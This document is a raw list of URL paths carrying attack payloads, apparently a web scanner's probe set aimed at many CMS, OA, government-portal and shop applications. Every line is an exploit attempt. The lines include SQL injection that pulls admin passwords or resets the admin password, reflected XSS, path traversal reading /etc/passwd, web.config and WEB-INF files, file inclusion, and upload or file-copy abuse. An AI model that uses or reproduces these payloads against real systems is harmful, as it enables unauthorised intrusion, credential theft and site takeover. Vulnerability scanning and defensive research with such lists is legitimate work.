/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?USEING_KEY=2&USERNAME=cfreer%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/portal/group/articl.php?portal_id=3&column_id=3&content_id=184)%20and%20(select%201%20from%20(select%20count(*),concat(0x3a,md5(1122),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20(1)=(1
/index.php?m=company&s=admin/business_info_list
/index.php?case=manage&act=delete&manage=orders&guest=1&id=-1
/getpwd4.asp
/?m=offer&s=offer_list&id=1-webscan%23
/MemberLogin.asp
/views.asp
/basket.asp?h%77_id=513%20and%201=2
/protextbox.asp?hw_%69d=513%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,chr(88),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin
/index.php?app=tag&ac=add&ts=do
/member/index.php?ugid31=51'%20and%20'1122'='12
/siteserver/cms/console_tableMetadata.aspx?ENName=cms_Content%27%29%20and%200%3C%28select%20top%201%20isnull%28cast%28%5Breer1122%5D%20as%20nvarchar%284000%29%29%2Cchar%2832%29%29%20from%20bairong_Administrator%20where%201%3D1%20and%20UserName%20not%20in%20%28select%20top%200%20UserName%20from%20bairong_Administrator%20where%201%3D1%20group%20by%20UserName%29%29%3B--
/UserCenter/platform/user.aspx?page=2&UnLock=True&UserNameCollection=1')%20and%200%3C(select%20webscan);--
/search.php?mod=information&ids=1-webscan&catid=1
/box.php?
/siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20--
/siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx
//siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20--
/siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20--
/downLoadFile.action?filePath=/WEB-INF/web.xml
/siteserver/UserRole/modal_userView.aspx?UserName=dd'%20and%201=char(106);--
/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
/job/job.php?lang=cn&id=2&settings[met_column]=met_admin_table%20where%201=2--%201
/searchLines.aspx?LName=h%25';
/ProductBuy.Asp
/newssearch.aspx?skey=1%25'%20and%201=char(106)%20--
/searchLines.aspx?LName=h&t=webscan()'
/viewlist.aspx?typeid=webscan()'
/company/index.php?datetime=&page=2&position=&profession=&type=1%20and%201=2&workadd=
/resource/avatar/avatar.php?a=uploadavatar&input=uid%3D1122.php
/?mod=account&code=Login_callback&cmd=a&from=../../../robots.txt%00
/admin/admin/getpassword.php?action=next4&abt_type=2&password=123456&passwordsr=123456&array[0]=reer1122
/index.php?index=a&skin=default/../&dataoptimize_html=/../../templates/default/images/css/metinfo.css
/gallery--p,0,1122%20and%200-0---1.html
/?m=info.detail&id=1-webscan
/misc.php?mod=getuserinfo&uid=-1
/?m=city.getSearch&index=reer
/?m=info&rewrite=1'%20union%20select%201,concat(0x23,md5(1122),0x23)%20from%20my_admin%20where%20id=1%20--%20a
/admin_aspcms/_content/_Spec/AspCms_SpecAdd.asp
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/Product.asp
/user/getpassword.asp
/admin_aspcms/_expand/_form/AspCms_FormFun.asp?action=del&FormField=reer&id=1122
/plus/ajax_user.php?act=check_email
/plus/ajax_user.php?act=check_usname
/HitCount.asp?LX=reer%20where%201=1%20union%20select%20Password%20from%20Admin
/ScoreProductSearchList.html?ProductCategoryID=12%20and%20%20@@version=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=2&Score2=3%20and%20char(106)=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=3%20and%20char(106)=1%20--
/index.php?app=user&ac=plugin&in=../../robots.txt%00
/member.php?act=login&op=forget
/item.php?act=search&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,char(99,102,114,101,101,114),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23&searchsort=subject&catid=0&ordersort=addtime&ordertype=asc&searchsubmit=yes
/?product-75-1@%7C1122%22%3E%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%20-index.html
/index.php?product-%22%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20-1122-viewpic.html
/?gallery-1--1--'%20%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20'--grid.html
/index.php?act=show_groupbuy&op=groupbuy_list&groupbuy_area=&groupbuy_class=&groupbuy_price=1&groupbuy_order_key=price&groupbuy_order=asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23
/index.php?act=search&key=click&order=desc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&cate_id=8
/wap/index.php
/deals?end_time=1&searchName=%25'%20AND%201=1%20AND%20'%25'='&start_time=1
/statistics.php?pageurl=pageurl&referer=http://www.baidu.com/?wd=aaaa%2527),((select%201%20from%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2,3,4,5,6,7,8,9)%23
/member/index.php
/wap/index.php?mod=space&userid=1'%20and%20extractvalue(1,(select%20md5(1122)from%20my_admin%20limit%201));%20%23
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=3&class_id_1=22&pconsume=&orderby=add_time%20asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&sort=asc
/video.php
/news.php?classid=2
/ajax.php?action=dig&module=members%20set%20username=00000,password=0x3235306366386235316337373366336638646338623462653836376139613032%20where%20uid=1%20--%20a
/count.php?type=news%20SET%20views%20=%20views-1%20WHERE%20id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20concat(0x3a,md5(1122),0x3a)%20from%20boka_members%20where%20uid=1),0x5e24),1))--+&&action=showcount&id=1
/ajax.php?action=contentpage
/comments.php?id=3a&tablepre=boka_ckck
/rss.php?module=news&attasql=union%20select%201,reer,3,4%20from%20boka_members%20where%20uid=1%20order%20by%20id%20asc%20%20--%20a
//wap/board.php?filter=3%20union%20select%201,2,3,4,webscan,6,7,8,9,10,11,cfreer,13,14,15,16,17,18,19,20,21,22%20from%20boka_members%20where%20uid=1%20--%20a&classid=1a&digest=1
/admin/index.php?_m=../template/css/login.css%00&_a=admin_list
/case/?settings[met_img]=met_admin_table%20where%201=1%20--%201
/login.aspx?test=TestSystem&password=1122&oid=2%20and%202=(convert(int,char(106)))&uid=1
/info.php?fid=1&tblprefix=cms_msession%20and%201=reer%20--
/ajax.php?action=letter&letter=a
/index.php?q=1%25%2527%2520and%25201%253D2%2520%2523&do=search&action=lists&module=product
/index.php?action=detail&do=offer&title=%2527or%25201%253D2%2523
/index.php/Index/index/name/$%7B@print(md5(1122))%7D
/index.php?m=news&s=admin/newslist&submit=%E5%88%A0%E9%99%A4&did=999%29%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28selEct%20concat%28user,0x7c,password%29%20from%20f10bd198561acb0197452013b7a82429%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
/index.php?m=payment&s=admin/pickupmod
/admin/receive.php?signMsg=0FEBF34C4A2EBF825F60025D6C0576F2&version=%3Cobject%20data=data:text/html;base64,PHNjcmlwdD5hbGVydCg0Mjg3Myk8L3NjcmlwdD4=%3E
/user/City_ajax.aspx?Cityid=-1'%20%20union%20%20SELECT%20'webscan',2%20FROM%20fs_sys_User%20WHERE%20id=7%20%20and%20'1'='1
/servlet/ShowPic?filePath=/tomcat/webapps/ROOT/WEB-INF/web.xml
/mep-admin/DcServlet
/mep-admin/userAction!queryUser.action?start=0&limit=10
/admin/picupload.aspx
/manager/picupload.aspx
/microshop/index.php?act=api&op=get_personal_commend&data_count=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x7c,md5(1122),0x7c),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46%20from%20shopnc_admin
/TreeDialogController.zc?backId=buyer_id_0&backName=buyer_name_0&dialogType=radio&method=getBuyerDialog&tempBackId=temp_buyur_id_0&tempBackName=temp_buyer_name_0
/admin.php?c=ajax&f=exit&filename=opt&group_id=1%20union%20select%203,1,0,md5(1122),account,6%20from%20qinggan_adm%20where%20id%20like%201%23&identifier=1
/index.php?c=tj&f=include&js=/../../config.php
/index.php?c=ueditor&f=remote_image&upfile=http://0.0.0.0/reer.php
/api.php?c=opt&f=index&group_id=-1%20union%20select%201,2,0,md5(1122),5,6&identifier=reer
/radcontrols/editor/dialog.aspx?dialog=ImageManager&editorID=');%3C/script%3E%3CScRiPt/acu%20src=1%20onerror=alert(42873)%3E%3C/ScRiPt%3E%3Cscript%3E//&language=zh_CN&sessionID2=8ca6abaf-d361-328c-9178-%20f78311cd0329&UseEmbeddedScripts=yes&useSession=0
/system/nhome/login.jsp?message=%22)--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/cgi/index.cgi?error=badlogin&__mode=show_login%27%22%28%29%26%25%3CScRiPt%20%3Ealert%2842873%29%3C%2fScRiPt%3E
/
/styles/outlook1/tools/calendar/calEditEvent.php?action=edit%22%3E%3Cscript%3Ealert(42873)%3C/script%3Ebad=%22&calid=
/web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0
/forgetbf.asp?errstr=--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/Ajax_Handle/UploadAttachmentHandler.ashx
/Web/Exam_List.aspx?typeid=18%20or%20(char(106)=0)
/Ajax_Handle/UploadPictureHandler.ashx
/Ajax_Handle/UploadLocalVideoHandler.ashx
/index.php?m=api&a=userpreview
/index.php?m=Appmanager&a=loadapp
/CMSUploadFile.aspx
/api/shop.aspx
/sysinfo.jsp
/login/Log.aspx?loginname=/**/'/**/and/**/char(106)%3E0/**/--
/login/publicpage.aspx?infotype=InfoZWGK_zwgk'/**/and/**/char(106)%3E0/**/--&dic_name=
/file/MyDownLoad.ashx?path=../web.config
/file/PackagDownload.ashx?sessionId=../../../../../webscan.txt
/broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/
/feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20--
/channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20
/login/proexamineview.aspx?ActivityInstanceId='/**/and/**/user/**/%3E0/**/--
/api.php?op=video_api&pc_hash=test%22/%3Ec%3Cscscriptript%3Ealert(42873)%3C/scscriptript%3E&&do_complete=1&uid=1&snid=1
/FileDownloadServlet?websiteId=1&templateName=/&fileNames=../../WEB-INF/config/db/dataSource.xml
/setup/setup1.jsp
/examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx
/Article/?Type=18%20/**/and/**/1=char(106)--
/login/TransactList.aspx?ItemName='/**/and/**/1=char(106)/**/--
/file/EmailDownload.ashx?url=~/web.config&name=web.config
/file/UDFDownLoad.ashx?path=~/Global.asax&name=Global.asax
/file/DownLoad.ashx?path=~/Routes.config
/file/FileUpload.asmx/UploadFileBase64?url=~/Content/cesi.aspx&data=VGhpcyBpcyBhIHRlc3QgLSBieSBjZnJlZXIgd2Vic2Nhbg%3D%3D&status=0
/file/FileUpload.asmx/CopyFile?sourcePath=/web.config&targetPath=/Content/reer.txt&overwrite=true
/download.jsp?path=WEB-INF/&name=web.xml
/page/upload/down_file.jsp?fileName=ljer.gif'%20or%20'1'='2
/mx_form/order_save.php
/index.php?app=tag&ac=add&ts=do
/member.php?act=index
/Article/?KeyWord=1'%20and%201=char(97)%20--
/apas/portal/tableDownload/download.jsp?tmpfilename=../index.jsp
/admin/payonline.php?act=login&table=information_schema.SCHEMATA%20where%201=(select%201%20from%20%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/frame/help/read_help.php?HELP_ID=-1%20union%20select%201,2,3,concat(0x7c,md5(1122),0x7c),5,6
/Channel/SearchResult.aspx?ItemName=1'%20or%201%3Echar(106)%20--
/Broadcast/Broadcast.aspx?type='%20or%201=char(106)%20--
/Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)--
/Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)--
/jvideo/down.jsp?pathfile=/WEB-INF/ini/merpserver.ini%00.flv
/jiep/down.jsp?pathfile=down.jsp%00.txt
/index.php?m=Goods&a=showcate&id=1'cfreer
/Goods-showcate-id-1.html'cfreer
/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20md5(1122)%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
/jvideo/objectbox/selectx_userlist.jsp
/yhzc/NewFile.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isPass.jsp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isFlag.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20--
/Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20--
/Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)--
/celerityAlleywayDetail.do?type=7'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)--
/ViewSource/SrcStencilList.aspx?listType=1&SerailNO=11xxxxxxxx&buqiId=22&infoflowId=1122'%20and/**/1=char(106)--
/ViewSource/ProExamineView.aspx?ActivityInstanceId=0&ActivitySchemeGuid=00000000-0000-0000-0000-00000000000'--
/burgherServiceDetail.do?bs=1&serviceType=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/yushouli/yushouliResult.do?item_ID=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/indexGetDatags.do?depNO=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/bqbzDetail.do?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/counter/counter2.php?id=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,md5(1122))%20as%20char),0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/oa_server/App_Pages/App_page/UserSpuerAdd.aspx
/oa_server/App_Pages/App_page/user_list.aspx
/cms/cms/site/cms_site_template_upload.jsp?action=save
/cai_study.asp?FN=cai/test.flv&cls_no=&cai_no=lzgy&stu_no=1122'%20and%201=char(106);--
/deptProceedingDetailnew.do?itemtype=6&depNO=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122&approveName=&nowPage=3
/deptProceedingDetailnew.do?itemtype=12%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)&depNO=jx&approveName=&nowPage=3
/lm/front/reg.jsp?sysid=../reg.jsp%00.jpg
/web/SubmitLogin.do
/pic.aspx?classid=60)%20and%201=char(106)%20--
/frm/Count.aspx?id=29308%20AND%201=char(106)%20--&type=List
/engine/websigncontrol/readsigndata.jsp?id='%20union%20select%20concat(char(98,121),0x7c,char(99,102,114,101,101,114))%23
/index.php?c=MTA3==&op=../../../../../../../../../../etc/passwd%00.jpg
/SRP2003/UserManage/sysuser/modifypage.asp?id=1
/venus/AsVenusCA/desk/message/reply.asp
/Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)--
/mx_form/order_save.php?form_id=5
/download.aspx?id=337&accessory=UploadFile/softdown/../../web.config
/cms/web/testsql.jsp
/web/zwdt/jjj.BjcxServlet
/login.php?LOGIN_USER_INCLUDE=/etc/passwd
/cms/client/uploadpic_html.jsp?toname=test.jsp&diskno=webscan
/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=11&AddWebColumnID=22&filepath=/app/
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
/webUser/webUser!list.action
/logincheck.php?UNAME=cfreer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/admin/annual/delete_leave.post.php
/admin/workingsituation/check.php?uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29&project=459&type=task&name=bbb
/admin/workingsituation/download_excel.php?day=30&start=&end=&project=0&uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29%23&task=0
/admin/workingsituation/ajax.php?task_id=10039s&type=update_status&status=1s%27%20and%201%3D%28updatexml%281%2Cconcat%280x23%2C%28select%20md5%281122%29%29%2C0x23%29%2C1%29%29%23
/down.asp?cat_%69d=3%20and%201=2%20union%20select%201,'ijx',3,4,5,6,7,8,9,10,11,12,13%20from%20admin
/jdwm/cgi/getpwd.cgi
/public/jspdownload.jsp?FileFullPath=%5Cetc%5Cpasswd&FileName=passwd
/public/jspdownload.jsp?FileFullPath=c:%5Cwindows%5Cwin.ini&FileName=win.ini
/cms/web/jspdownload.jsp?FileUrl=c:%5Cwindows%5Cwin.ini
/cms/web/jspdownload.jsp?FileUrl=%5Cetc%5Cpasswd
/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/reer.txt
/CorpInfo/CorpBaseInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAptitudeInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/PersonnelList.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAchievementList_SG.aspx?CorpCode=1122'%20and%201=char(106)%20--
/Credit/ShowCorpCredit.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpDeBox.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpRewardsList.aspx?RewardsPunishment=1122&CorpCode=1122'%20and%201=char(106)%20--
/BM/Project/HistoryBindSegmentLeftList.aspx?CorpType=1122&CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpSendLeftTree.aspx?JoinID=1122&CorpCode=1122'%20and%201=char(106)%20--
/forUI/Policy/showPolicy.aspx?ID=1122'%20and%201=char(106)%20--
/forUI/Person/EmplInfo.aspx?IDCard=1122'%20AND%201=CHAR(106)%20--%20
/forUI/Policy/DO.file?ID='%20or%201=char(106)%20--
/search/index/portalId/427?keyword=1'%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(114)%7C%7Cchr(101)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(114)%20FROM%20dual)))%7C%7C'
/Ajax_Handle/UploadAttachmentHandler.ashx
/ExtendForm/Down/Technological.aspx?id=1'%20and%201=char(106)%20--
/public/editext/up/soundsave.asp
/public/AspUpload/upload.asp?path=../../upload&processid=1
/xyEmployee_checkLoginForUser.do?userName=reer
/opac/ajax_get_file.php?filename=../admin/opacadminpwd.php
/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
/kc_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL#
/kecheng.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL#%20
/kecheng_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/include/ad.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/index.php?language_id=1%20and%20%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28select%28md5%281122%29%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23&is_protect=1&action=cccc
/picnews.asp?%69d=-1%20and%201=2%20union%20select%201,2,3,chr(106),5,6,7,8,9,10,11,12%20from%20admin
/opensoft.asp?%69d=10%20and%201=2
/phpsso_server/?m=phpsso&c=index&a=getapplist&appid=1&data=
/bmsltxDetail.do
/setAcceptance.do
/setAcceptance.do
/setMaterials.do?ITEM_ID=12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
